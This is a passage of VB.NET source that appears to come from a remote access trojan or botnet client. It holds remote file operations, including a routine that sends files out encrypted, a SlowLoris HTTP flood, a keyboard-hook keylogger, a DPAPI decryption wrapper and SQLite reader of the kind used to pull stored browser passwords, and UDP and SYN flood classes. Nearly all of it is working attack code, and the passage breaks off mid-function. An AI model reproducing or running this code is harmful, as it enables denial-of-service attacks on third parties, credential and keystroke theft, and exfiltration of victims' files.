1425 My.Computer.FileSystem.MoveDirectory(oldpath, newpath & name, True)
1426 Catch
1427 End Try
1428 End Sub
1429 Sub copydirectory(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1430 Try
1431 My.Computer.FileSystem.CopyDirectory(oldpath, newpath & name, True)
1432 Catch
1433 End Try
1434 End Sub
1435 Sub CreateNewFile(ByVal txt As String)
1436 Try
1437 txt = txt.Replace("mkfile", "")
1438 Dim path As String = txt.Split("|")(0)
1439 Dim content As String = txt.Split("|")(1)
1440 IO.File.WriteAllText(path, content)
1441 Catch
1442 End Try
1443 End Sub
1444 Sub deletefile(ByVal path As String)
1445 Try
1446 My.Computer.FileSystem.DeleteFile(path, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently)
1447 Catch
1448 End Try
1449 End Sub
1450 Sub renamefile(ByVal path As String, ByVal newname As String)
1451 Try
1452 My.Computer.FileSystem.RenameFile(path, newname)
1453 Catch
1454 End Try
1455 End Sub
1456 Sub movefile(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1457 Try
1458 My.Computer.FileSystem.MoveFile(oldpath, newpath & name, True)
1459 Catch
1460 End Try
1461 End Sub
1462 Sub copyfile(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1463 Try
1464 My.Computer.FileSystem.CopyFile(oldpath, newpath & name, True)
1465 Catch
1466 End Try
1467 End Sub
1468 Sub sharefile(ByVal filepath As String)
1469 Dim file As String = Convert.ToBase64String(IO.File.ReadAllBytes(filepath))
1470 Send(AES_Encrypt("IncomingFile" & file, enckey))
1471 End Sub
1472 End Class
1473 Public Class SlowLoris
1474 Public Shared TList As New System.Collections.Generic.List(Of Thread)()
1475 Public Target As String = ""
1476 Public AOThreads As Integer = 50
1477 Public AOSockets As Integer = 70
1478 Dim IsFlooding As Boolean = True
1479 Dim WithEvents tmrGenerateRandomData As New System.Windows.Forms.Timer
1480 Dim labeldatasent As String
1481 Sub Start()
1482 Try
1483 tmrGenerateRandomData.Start()
1484 IsFlooding = True
1485 For i As Integer = 0 To AOSockets - 1
1486 TList.Add((New Thread(New ThreadStart(AddressOf InitFlood))))
1487 TList(TList.Count - 1).Start()
1488 Next
1489 Catch
1490 End Try
1491 End Sub
1492 Public Function GenerateChar(ByVal intLength As Integer, Optional ByVal strAllowedCharacters As String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") As String
1493 Randomize()
1494 Dim chrChars() As Char = strAllowedCharacters.ToCharArray
1495 Dim strReturn As New StringBuilder
1496 Dim grtRandom As New Random
1497 Do Until Len(strReturn.ToString) = intLength
1498 Dim x As Integer = Rnd() * (chrChars.Length - 1)
1499 strReturn.Append(chrChars(CInt(x)))
1500 Loop
1501 Return strReturn.ToString
1502 End Function
1503 Private Sub InitFlood()
1504 Dim Shocks As Socket() = New Socket(AOThreads - 1) {}
1505 Dim uri As New Uri(Target)
1506 For i As Integer = 0 To AOThreads - 1
1507 If Not IsFlooding Then
1508 GoTo ENDLOOP
1509 End If
1510 Shocks(i) = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
1511 Next
1512 While True
1513 If Not IsFlooding Then
1514 GoTo ENDLOOP
1515 End If
1516 For i As Integer = 0 To AOThreads - 1
1517 If Not IsFlooding Then
1518 GoTo ENDLOOP
1519 End If
1520 If Not Shocks(i).Connected Then
1521RETRY_CONNECT:
1522 If Not IsFlooding Then
1523 GoTo ENDLOOP
1524 End If
1525 Try
1526 Shocks(i) = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
1527 Shocks(i).Connect(Dns.GetHostAddresses(uri.Host)(0), 80)
1528 Shocks(i).Send(System.Text.Encoding.ASCII.GetBytes("GET " & uri.PathAndQuery &
1529 " HTTP/1.1" & vbCr & vbLf & "Host: " & uri.Host & vbCr & vbLf & "User-Agent: " &
1530 labeldatasent & " (config: per_thread=" & AOThreads & "; aotv2=" & AOSockets & ";)" & vbCr & vbLf), SocketFlags.None)
1531 Catch generatedExceptionName As Exception
1532 If Not IsFlooding Then
1533 GoTo ENDLOOP
1534 End If
1535 Thread.Sleep(1000)
1536 GoTo RETRY_CONNECT
1537 End Try
1538 End If
1539 If Not IsFlooding Then
1540 GoTo ENDLOOP
1541 End If
1542 Next
1543 If Not IsFlooding Then
1544 GoTo ENDLOOP
1545 End If
1546[LOOP]:
1547 If Not IsFlooding Then
1548 GoTo ENDLOOP
1549 End If
1550 Try
1551 For i As Integer = 0 To AOThreads - 1
1552 If Not IsFlooding Then
1553 GoTo ENDLOOP
1554 End If
1555
1556 Shocks(i).Send(System.Text.Encoding.ASCII.GetBytes("X-" & Randomnum(10) & ": 1" & vbCr & vbLf), SocketFlags.None)
1557 Next
1558 Catch ex As Exception
1559 End Try
1560 Thread.Sleep(4000)
1561 If Not IsFlooding Then
1562 GoTo ENDLOOP
1563 End If
1564 GoTo [LOOP]
1565 End While
1566ENDLOOP:
1567 For i As Integer = 0 To AOThreads - 1
1568 If Shocks(i).Connected Then
1569 Shocks(i).Disconnect(False)
1570 End If
1571 Shocks(i) = Nothing
1572 Next
1573 End Sub
1574 Private r As New Random(Environment.TickCount)
1575 Public Function Randomnum(ByVal length As Integer) As String
1576 Dim outstr As String = ""
1577 For i As Integer = 0 To length - 1
1578 outstr += r.[Next](9)
1579 Next
1580 Return outstr
1581 End Function
1582 Private Sub tmrGenerateRandomData_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles tmrGenerateRandomData.Tick
1583 labeldatasent = GenerateChar(16)
1584 End Sub
1585 Sub StopFlood()
1586 tmrGenerateRandomData.Stop()
1587 IsFlooding = False
1588 TList.Clear()
1589 For Each t As Thread In TList
1590 If t.ThreadState <> ThreadState.Stopped Then
1591 Return
1592 End If
1593 Next
1594 End Sub
1595 End Class
1596 Public Class Keylogger
1597 Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" (ByVal Hook As Integer, ByVal KeyDelegate As KDel, ByVal HMod As Integer, ByVal ThreadId As Integer) As Integer
1598 Private Declare Function CallNextHookEx Lib "user32" (ByVal Hook As Integer, ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1599 Private Declare Function UnhookWindowsHookEx Lib "user32" Alias "UnhookWindowsHookEx" (ByVal Hook As Integer) As Integer
1600 Private Delegate Function KDel(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1601 Public Shared Event Down(ByVal Key As String)
1602 Public Shared Event Up(ByVal Key As String)
1603 Private Shared Key As Integer
1604 Private Shared KHD As KDel
1605 Private Structure KeyStructure : Public Code As Integer : Public ScanCode As Integer : Public Flags As Integer : Public Time As Integer : Public ExtraInfo As Integer : End Structure
1606 Public Sub CreateHook()
1607 KHD = New KDel(AddressOf Proc)
1608 Key = SetWindowsHookEx(13, KHD, System.Runtime.InteropServices.Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly.GetModules()(0)).ToInt32, 0)
1609 End Sub
1610
1611 Private Function Proc(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1612 If (Code = 0) Then
1613 Select Case wParam
1614 Case &H100, &H104 : RaiseEvent Down(Feed(CType(lParam.Code, Keys)))
1615 Case &H101, &H105 : RaiseEvent Up(Feed(CType(lParam.Code, Keys)))
1616 End Select
1617 End If
1618 Return CallNextHookEx(Key, Code, wParam, lParam)
1619 End Function
1620 Public Sub DiposeHook()
1621 UnhookWindowsHookEx(Key)
1622 MyBase.Finalize()
1623 End Sub
1624 Private Function Feed(ByVal e As Keys) As String
1625 Select Case e
1626 Case 65 To 90
1627 If Control.IsKeyLocked(Keys.CapsLock) Or (Control.ModifierKeys And Keys.Shift) <> 0 Then
1628 Return e.ToString
1629 Else
1630 Return e.ToString.ToLower
1631 End If
1632 Case 48 To 57
1633 If (Control.ModifierKeys And Keys.Shift) <> 0 Then
1634 Select Case e.ToString
1635 Case "D1" : Return "!"
1636 Case "D2" : Return "@"
1637 Case "D3" : Return "#"
1638 Case "D4" : Return "$"
1639 Case "D5" : Return "%"
1640 Case "D6" : Return "^"
1641 Case "D7" : Return "&"
1642 Case "D8" : Return "*"
1643 Case "D9" : Return "("
1644 Case "D0" : Return ")"
1645 End Select
1646 Else
1647 Return e.ToString.Replace("D", Nothing)
1648 End If
1649 Case 96 To 105
1650 Return e.ToString.Replace("NumPad", Nothing)
1651 Case 106 To 111
1652 Select Case e.ToString
1653 Case "Divide" : Return "/"
1654 Case "Multiply" : Return "*"
1655 Case "Subtract" : Return "-"
1656 Case "Add" : Return "+"
1657 Case "Decimal" : Return "."
1658 End Select
1659 Case 32
1660 Return " "
1661 Case 186 To 222
1662 If (Control.ModifierKeys And Keys.Shift) <> 0 Then
1663 Select Case e.ToString
1664 Case "OemMinus" : Return "_"
1665 Case "Oemplus" : Return "+"
1666 Case "OemOpenBrackets" : Return "{"
1667 Case "Oem6" : Return "}"
1668 Case "Oem5" : Return "|"
1669 Case "Oem1" : Return ":"
1670 Case "Oem7" : Return """"
1671 Case "Oemcomma" : Return "<"
1672 Case "OemPeriod" : Return ">"
1673 Case "OemQuestion" : Return "?"
1674 Case "Oemtilde" : Return "~"
1675 End Select
1676 Else
1677 Select Case e.ToString
1678 Case "OemMinus" : Return "-"
1679 Case "Oemplus" : Return "="
1680 Case "OemOpenBrackets" : Return "["
1681 Case "Oem6" : Return "]"
1682 Case "Oem5" : Return "\"
1683 Case "Oem1" : Return ";"
1684 Case "Oem7" : Return "'"
1685 Case "Oemcomma" : Return ","
1686 Case "OemPeriod" : Return "."
1687 Case "OemQuestion" : Return "/"
1688 Case "Oemtilde" : Return "`"
1689 End Select
1690 End If
1691 Case Keys.Return
1692 Return Environment.NewLine
1693 Case Else
1694 Return "<" + e.ToString + ">"
1695 End Select
1696 Return Nothing
1697 End Function
1698 End Class
1699#Region "Module Main, Functions & Variables"
1700 Module Main
1701 Dim text As String
1702 <DllImport("Crypt32.dll", SetLastError:=True, CharSet:=System.Runtime.InteropServices.CharSet.Auto)>
1703 Private Function CryptUnprotectData(ByRef pDataIn As DATA_BLOB, ByVal szDataDescr As String, ByRef pOptionalEntropy As DATA_BLOB, ByVal pvReserved As IntPtr, ByRef pPromptStruct As CRYPTPROTECT_PROMPTSTRUCT, ByVal dwFlags As Integer, ByRef pDataOut As DATA_BLOB) As Boolean
1704 End Function
1705
1706 <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure CRYPTPROTECT_PROMPTSTRUCT
1707 Public cbSize As Integer
1708 Public dwPromptFlags As CryptProtectPromptFlags
1709 Public hwndApp As IntPtr
1710 Public szPrompt As String
1711 End Structure
1712 <Flags()> Enum CryptProtectPromptFlags
1713 CRYPTPROTECT_PROMPT_ON_UNPROTECT = &H1
1714 CRYPTPROTECT_PROMPT_ON_PROTECT = &H2
1715 End Enum
1716 Function Decrypt(ByVal Datas() As Byte) As String
1717 Dim inj, Ors As New DATA_BLOB
1718 Dim Ghandle As GCHandle = GCHandle.Alloc(Datas, GCHandleType.Pinned)
1719 inj.pbData = Ghandle.AddrOfPinnedObject()
1720 inj.cbData = Datas.Length
1721 Ghandle.Free()
1722 CryptUnprotectData(inj, Nothing, Nothing, Nothing, Nothing, 0, Ors)
1723 Dim Returned() As Byte = New Byte(Ors.cbData) {}
1724 Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData)
1725 Dim TheString As String = Encoding.Default.GetString(Returned)
1726 Return TheString.Substring(0, TheString.Length - 1)
1727 End Function
1728 <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure DATA_BLOB
1729 Public cbData As Integer
1730 Public pbData As IntPtr
1731 End Structure
1732 End Module
1733 Public Class SQLiteHandler
1734 Private db_bytes() As Byte
1735 Private page_size As UInt16
1736 Private encoding As UInt64
1737 Private master_table_entries() As sqlite_master_entry
1738
1739 Private SQLDataTypeSize() As Byte = New Byte() {0, 1, 2, 3, 4, 6, 8, 8, 0, 0}
1740 Private table_entries() As table_entry
1741 Private field_names() As String
1742
1743 Private Structure record_header_field
1744 Dim size As Int64
1745 Dim type As Int64
1746 End Structure
1747
1748 Private Structure table_entry
1749 Dim row_id As Int64
1750 Dim content() As String
1751 End Structure
1752
1753 Private Structure sqlite_master_entry
1754 Dim row_id As Int64
1755 Dim item_type As String
1756 Dim item_name As String
1757 Dim astable_name As String
1758 Dim root_num As Int64
1759 Dim sql_statement As String
1760 End Structure
1761
1762 Private Function GVL(ByVal startIndex As Integer) As Integer
1763 If startIndex > db_bytes.Length Then Return Nothing
1764
1765 For i As Integer = startIndex To startIndex + 8 Step 1
1766 If i > db_bytes.Length - 1 Then
1767 Return Nothing
1768 ElseIf (db_bytes(i) And &H80) <> &H80 Then
1769 Return i
1770 End If
1771 Next
1772
1773 Return startIndex + 8
1774 End Function
1775
1776 Private Function CVL(ByVal startIndex As Integer, ByVal endIndex As Integer) As Int64
1777 endIndex = endIndex + 1
1778
1779 Dim retus(7) As Byte
1780 Dim Length As Object = endIndex - startIndex
1781 Dim Bit64 As Boolean = False
1782
1783 If Length = 0 Or Length > 9 Then Return Nothing
1784 If Length = 1 Then
1785 retus(0) = (db_bytes(startIndex) And &H7F)
1786 Return BitConverter.ToInt64(retus, 0)
1787 End If
1788
1789 If Length = 9 Then
1790 Bit64 = True
1791 End If
1792
1793 Dim j As Integer = 1
1794 Dim k As Integer = 7
1795 Dim y As Integer = 0
1796
1797 If Bit64 Then
1798 retus(0) = db_bytes(endIndex - 1)
1799 endIndex = endIndex - 1
1800 y = 1
1801 End If
1802
1803 For i As Integer = (endIndex - 1) To startIndex Step -1
1804 If (i - 1) >= startIndex Then
1805 retus(y) = ((db_bytes(i) >> (j - 1)) And (&HFF >> j)) Or (db_bytes(i - 1) << k)
1806 j = j + 1
1807 y = y + 1
1808 k = k - 1
1809 Else
1810 If Not Bit64 Then retus(y) = ((db_bytes(i) >> (j - 1)) And (&HFF >> j))
1811 End If
1812 Next
1813
1814 Return BitConverter.ToInt64(retus, 0)
1815 End Function
1816
1817 Private Function IsOdd(ByVal value As Int64) As Boolean
1818 Return (value And 1) = 1
1819 End Function
1820
1821 Private Function ConvertToInteger(ByVal startIndex As Integer, ByVal Size As Integer) As UInt64
1822 If Size > 8 Or Size = 0 Then Return Nothing
1823
1824 Dim retVal As UInt64 = 0
1825
1826 For i As Integer = 0 To Size - 1 Step 1
1827 retVal = ((retVal << 8) Or db_bytes(startIndex + i))
1828 Next
1829
1830 Return retVal
1831 End Function
1832
1833 Private Sub ReadMasterTable(ByVal Offset As UInt64)
1834
1835 If db_bytes(Offset) = &HD Then
1836
1837 Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1838 Dim ol As Integer = 0
1839
1840 If Not master_table_entries Is Nothing Then
1841 ol = master_table_entries.Length
1842 ReDim Preserve master_table_entries(master_table_entries.Length + Length)
1843 Else
1844 ReDim master_table_entries(Length)
1845 End If
1846
1847 Dim ent_offset As UInt64
1848
1849 For i As Integer = 0 To Length Step 1
1850 ent_offset = ConvertToInteger(Offset + 8 + (i * 2), 2)
1851
1852 If Offset <> 100 Then ent_offset = ent_offset + Offset
1853
1854 Dim t As Object = GVL(ent_offset)
1855 Dim size As Int64 = CVL(ent_offset, t)
1856
1857 Dim s As Object = GVL(ent_offset + (t - ent_offset) + 1)
1858 master_table_entries(ol + i).row_id = CVL(ent_offset + (t - ent_offset) + 1, s)
1859
1860 ent_offset = ent_offset + (s - ent_offset) + 1
1861
1862 t = GVL(ent_offset)
1863 s = t
1864 Dim Rec_Header_Size As Int64 = CVL(ent_offset, t)
1865
1866 Dim Field_Size(4) As Int64
1867
1868 For j As Integer = 0 To 4 Step 1
1869 t = s + 1
1870 s = GVL(t)
1871 Field_Size(j) = CVL(t, s)
1872
1873 If Field_Size(j) > 9 Then
1874 If IsOdd(Field_Size(j)) Then
1875 Field_Size(j) = (Field_Size(j) - 13) / 2
1876 Else
1877 Field_Size(j) = (Field_Size(j) - 12) / 2
1878 End If
1879 Else
1880 Field_Size(j) = SQLDataTypeSize(Field_Size(j))
1881 End If
1882 Next
1883
1884 If encoding = 1 Then
1885 master_table_entries(ol + i).item_type = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1886 ElseIf encoding = 2 Then
1887 master_table_entries(ol + i).item_type = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1888 ElseIf encoding = 3 Then
1889 master_table_entries(ol + i).item_type = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1890 End If
1891 If encoding = 1 Then
1892 master_table_entries(ol + i).item_name = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1893 ElseIf encoding = 2 Then
1894 master_table_entries(ol + i).item_name = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1895 ElseIf encoding = 3 Then
1896 master_table_entries(ol + i).item_name = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1897 End If
1898 master_table_entries(ol + i).root_num = ConvertToInteger(ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2), Field_Size(3))
1899 If encoding = 1 Then
1900 master_table_entries(ol + i).sql_statement = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1901 ElseIf encoding = 2 Then
1902 master_table_entries(ol + i).sql_statement = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1903 ElseIf encoding = 3 Then
1904 master_table_entries(ol + i).sql_statement = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1905 End If
1906 Next
1907 ElseIf db_bytes(Offset) = &H5 Then
1908 Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1909 Dim ent_offset As UInt16
1910
1911 For i As Integer = 0 To Length Step 1
1912 ent_offset = ConvertToInteger(Offset + 12 + (i * 2), 2)
1913
1914 If Offset = 100 Then
1915 ReadMasterTable((ConvertToInteger(ent_offset, 4) - 1) * page_size)
1916 Else
1917 ReadMasterTable((ConvertToInteger(Offset + ent_offset, 4) - 1) * page_size)
1918 End If
1919
1920 Next
1921
1922 ReadMasterTable((ConvertToInteger(Offset + 8, 4) - 1) * page_size)
1923 End If
1924 End Sub
1925
1926 Private Function ReadTableFromOffset(ByVal Offset As UInt64) As Boolean
1927 If db_bytes(Offset) = &HD Then
1928
1929 Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1930 Dim ol As Integer = 0
1931
1932 If Not table_entries Is Nothing Then
1933 ol = table_entries.Length
1934 ReDim Preserve table_entries(table_entries.Length + Length)
1935 Else
1936 ReDim table_entries(Length)
1937 End If
1938
1939 Dim ent_offset As UInt64
1940
1941 For i As Integer = 0 To Length Step 1
1942 ent_offset = ConvertToInteger(Offset + 8 + (i * 2), 2)
1943
1944 If Offset <> 100 Then ent_offset = ent_offset + Offset
1945
1946 Dim t As Object = GVL(ent_offset)
1947 Dim size As Int64 = CVL(ent_offset, t)
1948
1949 Dim s As Object = GVL(ent_offset + (t - ent_offset) + 1)
1950 table_entries(ol + i).row_id = CVL(ent_offset + (t - ent_offset) + 1, s)
1951
1952 ent_offset = ent_offset + (s - ent_offset) + 1
1953
1954 t = GVL(ent_offset)
1955 s = t
1956 Dim Rec_Header_Size As Int64 = CVL(ent_offset, t)
1957
1958 Dim Field_Size() As record_header_field = Nothing
1959 Dim size_read As Int64 = (ent_offset - t) + 1
1960 Dim j As Object = 0
1961
1962 While size_read < Rec_Header_Size
1963 ReDim Preserve Field_Size(j)
1964
1965 t = s + 1
1966 s = GVL(t)
1967 Field_Size(j).type = CVL(t, s)
1968
1969 If Field_Size(j).type > 9 Then
1970 If IsOdd(Field_Size(j).type) Then
1971 Field_Size(j).size = (Field_Size(j).type - 13) / 2
1972 Else
1973 Field_Size(j).size = (Field_Size(j).type - 12) / 2
1974 End If
1975 Else
1976 Field_Size(j).size = SQLDataTypeSize(Field_Size(j).type)
1977 End If
1978
1979 size_read = size_read + (s - t) + 1
1980 j = j + 1
1981 End While
1982
1983 ReDim table_entries(ol + i).content(Field_Size.Length - 1)
1984 Dim counter As Integer = 0
1985
1986 For k As Integer = 0 To Field_Size.Length - 1 Step 1
1987 If Field_Size(k).type > 9 Then
1988 If Not IsOdd(Field_Size(k).type) Then
1989 If encoding = 1 Then
1990 table_entries(ol + i).content(k) = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1991 ElseIf encoding = 2 Then
1992 table_entries(ol + i).content(k) = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1993 ElseIf encoding = 3 Then
1994 table_entries(ol + i).content(k) = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1995 End If
1996 Else
1997 table_entries(ol + i).content(k) = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1998 End If
1999 Else
2000 table_entries(ol + i).content(k) = CStr(ConvertToInteger(ent_offset + Rec_Header_Size + counter, Field_Size(k).size))
2001 End If
2002
2003 counter = counter + Field_Size(k).size
2004 Next
2005 Next
2006 ElseIf db_bytes(Offset) = &H5 Then
2007 Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
2008 Dim ent_offset As UInt16
2009
2010 For i As Integer = 0 To Length Step 1
2011 ent_offset = ConvertToInteger(Offset + 12 + (i * 2), 2)
2012
2013 ReadTableFromOffset((ConvertToInteger(Offset + ent_offset, 4) - 1) * page_size)
2014 Next
2015
2016 ReadTableFromOffset((ConvertToInteger(Offset + 8, 4) - 1) * page_size)
2017 End If
2018
2019 Return True
2020 End Function
2021
2022 Public Function ReadTable(ByVal TableName As String) As Boolean
2023
2024 Dim found As Integer = -1
2025
2026 For i As Integer = 0 To master_table_entries.Length Step 1
2027 If master_table_entries(i).item_name.ToLower().CompareTo(TableName.ToLower()) = 0 Then
2028 found = i
2029 Exit For
2030 End If
2031 Next
2032
2033 If found = -1 Then Return False
2034
2035 Dim fields() As Object = master_table_entries(found).sql_statement.Substring(master_table_entries(found).sql_statement.IndexOf("(") + 1).Split(",")
2036
2037 For i As Integer = 0 To fields.Length - 1 Step 1
2038 fields(i) = LTrim(fields(i))
2039
2040 Dim index As Object = fields(i).IndexOf(" ")
2041
2042 If index > 0 Then fields(i) = fields(i).Substring(0, index)
2043
2044 If fields(i).IndexOf("UNIQUE") = 0 Then
2045 Exit For
2046 Else
2047 ReDim Preserve field_names(i)
2048 field_names(i) = fields(i)
2049 End If
2050 Next
2051
2052 Return ReadTableFromOffset((master_table_entries(found).root_num - 1) * page_size)
2053 End Function
2054
2055 Public Function GetRowCount() As Integer
2056 Return table_entries.Length
2057 End Function
2058
2059 Public Function GetValue(ByVal row_num As Integer, ByVal field As Integer) As String
2060 If row_num >= table_entries.Length Then Return Nothing
2061 If field >= table_entries(row_num).content.Length Then Return Nothing
2062
2063 Return table_entries(row_num).content(field)
2064 End Function
2065
2066 Public Function GetValue(ByVal row_num As Integer, ByVal field As String) As String
2067 Dim found As Integer = -1
2068
2069 For i As Integer = 0 To field_names.Length Step 1
2070 If field_names(i).ToLower().CompareTo(field.ToLower()) = 0 Then
2071 found = i
2072 Exit For
2073 End If
2074 Next
2075
2076 If found = -1 Then Return Nothing
2077
2078 Return GetValue(row_num, found)
2079 End Function
2080
2081 Public Function GetTableNames() As String()
2082 Dim retVal As String() = Nothing
2083 Dim arr As Object = 0
2084
2085 For i As Integer = 0 To master_table_entries.Length - 1 Step 1
2086 If master_table_entries(i).item_type = "table" Then
2087 ReDim Preserve retVal(arr)
2088 retVal(arr) = master_table_entries(i).item_name
2089 arr = arr + 1
2090 End If
2091 Next
2092
2093 Return retVal
2094 End Function
2095
2096 Public Sub New(ByVal baseName As String)
2097 If File.Exists(baseName) Then
2098 FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
2099 Dim asi As String = Space(LOF(1))
2100 FileGet(1, asi)
2101 FileClose(1)
2102
2103 db_bytes = System.Text.Encoding.Default.GetBytes(asi)
2104
2105 If System.Text.Encoding.Default.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") <> 0 Then
2106 Throw New Exception("Not a valid SQLite 3 Database File")
2107 End
2108 End If
2109
2110 If db_bytes(52) <> 0 Then
2111 Throw New Exception("Auto-vacuum capable database is not supported")
2112 End
2113 ElseIf ConvertToInteger(44, 4) >= 4 Then
2114 Throw New Exception("No supported Schema layer file-format")
2115 End
2116 End If
2117
2118 page_size = ConvertToInteger(16, 2)
2119 encoding = ConvertToInteger(56, 4)
2120
2121 If encoding = 0 Then encoding = 1
2122
2123 ReadMasterTable(100)
2124 End If
2125 End Sub
2126 End Class
2127#End Region
2128#Region "DDoS"
2129 Public Class UDPFlood
2130 Public Shared Host As String
2131 Public Shared Port As Integer
2132 Public Shared Threads As Integer
2133 Public Shared FloodRunning As Boolean
2134 Public Shared udpClient As New Sockets.UdpClient
2135 Public Shared bytCommand As Byte() = New Byte() {}
2136 Public Shared IP As IPAddress
2137 Public Shared Sub StartUDPFlood()
2138 If FloodRunning = False Then
2139 FloodRunning = True
2140 bytCommand = Encoding.ASCII.GetBytes(GetBytes)
2141 IP = IPAddress.Parse(Host)
2142 For NumberOfThreads As Integer = 0 To Threads
2143 Dim Flooding As Thread
2144 Flooding = New Thread(AddressOf Flood)
2145 Flooding.Start()
2146 Next
2147 End If
2148 End Sub
2149 Public Shared Sub Flood()
2150 Do While FloodRunning = True
2151 Try
2152 udpClient.Connect(IP, Port)
2153 udpClient.Send(bytCommand, bytCommand.Length)
2154 Catch
2155 End Try
2156 Loop
2157 Thread.CurrentThread.Abort()
2158 End Sub
2159 Shared Sub StopUDPFlood()
2160 If FloodRunning = True Then
2161 FloodRunning = False
2162 End If
2163 End Sub
2164 Shared Function GetBytes() As String
2165 Dim R As New Random
2166 Dim Bytes As String = ""
2167 Dim Letters As String = "qwertyuioplkjhgfdsazxcvbnm"
2168 Dim Capitals As String = "QWERTYUIOPLKJHGFDSAZXCVBNM"
2169 Dim Numbers As String = "0123456789"
2170 Dim Signs As String = "!£$%^&*()-_=+]}{[;:'@#~<,.>/?"
2171 For i As Integer = 0 To R.Next(300, 500)
2172 Select Case R.Next(0, 4)
2173 Case 0
2174 Bytes += Letters.ToCharArray()(R.Next((R.Next(0, 26))))
2175 Case 1
2176 Bytes += Capitals.ToCharArray()(R.Next(0, 26))
2177 Case 2
2178 Bytes += Numbers.ToCharArray()(R.Next(0, 10))
2179 Case 3
2180 Bytes += Signs.ToCharArray()(R.Next(0, 29))
2181 End Select
2182 Next
2183 Return Bytes
2184 End Function
2185 End Class
2186 Public Class SynFlood
2187 Private Shared FloodingJob As ThreadStart()
2188 Private Shared FloodingThread As Thread()
2189 Public Shared Host As String
2190 Private Shared ipEo As IPEndPoint
2191 Public Shared Port As Integer
2192 Private Shared SynClass As SendSyn()
2193 Public Shared SynSockets As Integer
2194 Public Shared Threads As Integer
2195 Public Shared IsRunning As Boolean = False
2196 Public Shared Sub StartSynFlood()
2197 IsRunning = True
2198 Try
2199 ipEo = New IPEndPoint(Dns.GetHostEntry(Host).AddressList(0), Port)
2200 Catch
2201 ipEo = New IPEndPoint(IPAddress.Parse(Host), Port)
2202 End Try
2203 FloodingThread = New Thread(Threads - 1) {}
2204 FloodingJob = New ThreadStart(Threads - 1) {}
2205 SynClass = New SendSyn(Threads - 1) {}
2206 For i As Integer = 0 To Threads - 1
2207 SynClass(i) = New SendSyn(ipEo, SynSockets)
2208 FloodingJob(i) = New ThreadStart(AddressOf SynClass(i).Send)
2209 FloodingThread(i) = New Thread(FloodingJob(i))
2210 FloodingThread(i).Start()
2211 Next
2212 End Sub
2213 Public Shared Sub StopSynFlood()
2214 For i As Integer = 0 To Threads - 1
2215 Try
2216 FloodingThread(i).Abort()
2217 Catch
2218 End Try
2219 Next
2220 IsRunning = False
2221 End Sub
2222 Private Class SendSyn
2223 Private ipEo As IPEndPoint
2224 Private Sock As Socket()
2225 Private SynSockets As Integer
2226 Public Sub New(ByVal ipEo As IPEndPoint, ByVal SynSockets As Integer)
2227 Me.ipEo = ipEo
2228 Me.SynSockets = SynSockets
2229 End Sub
2230 Public Sub OnConnect(ByVal ar As IAsyncResult)
2231
2232 End Sub
2233 Public Sub Send()
2234 Dim num As Integer
2235Label_0000:
2236 Try
2237 Me.Sock = New Socket(Me.SynSockets - 1) {}
2238 For num = 0 To Me.SynSockets - 1
2239 Me.Sock(num) = New Socket(Me.ipEo.AddressFamily, SocketType.Stream, ProtocolType.Tcp)
2240 Me.Sock(num).Blocking = False
2241 Dim callback As New AsyncCallback(AddressOf Me.OnConnect)
2242 Me.Sock(num).BeginConnect(Me.ipEo, callback, Me.Sock(num))
2243 Next
2244 Thread.Sleep(100)
2245 For num = 0 To Me.SynSockets - 1
2246 If Me.Sock(num).Connected Then
2247 Me.Sock(num).Disconnect(False)
2248 End If
2249 Me.Sock(num).Close()
2250 Me.Sock(num) = Nothing
